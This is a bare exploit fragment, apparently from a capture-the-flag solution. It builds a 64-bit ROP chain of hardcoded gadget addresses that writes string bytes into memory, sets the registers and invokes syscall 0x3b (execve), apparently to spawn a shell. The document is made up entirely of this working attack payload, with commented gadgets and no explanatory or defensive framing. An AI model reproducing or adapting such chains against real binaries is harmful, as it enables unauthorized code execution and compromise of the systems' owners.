payload = p64(0x4beee4)
#0x4beee4: pop rbx ; retf 0
payload += p64(0x6e69622f)+p32(0x40125d)+p32(0x33)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x4f30ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4beee4)
# 0x4beee4: pop rbx ; retf 0
payload += p64(0x68662f)+p32(0x40125d)+p32(0x33)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x4f30b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4d70b3)
# 0x00000000004d70b3: pop rax; ret; 
payload += p64(0x0)+p64(0x46f629)
# 0x000000000046f629: xchg esi, eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4f3070)+p64(0x42282a)
# 0x000000000042282a: pop rdx; ret; 
payload += p64(0x0)+p64(0x4d70b3)
# 0x00000000004d70b3: pop rax; ret; 
payload += p64(0x3b)+p64(0x4041dc)
# 0x00000000004041dc: syscall; 
payload += b''
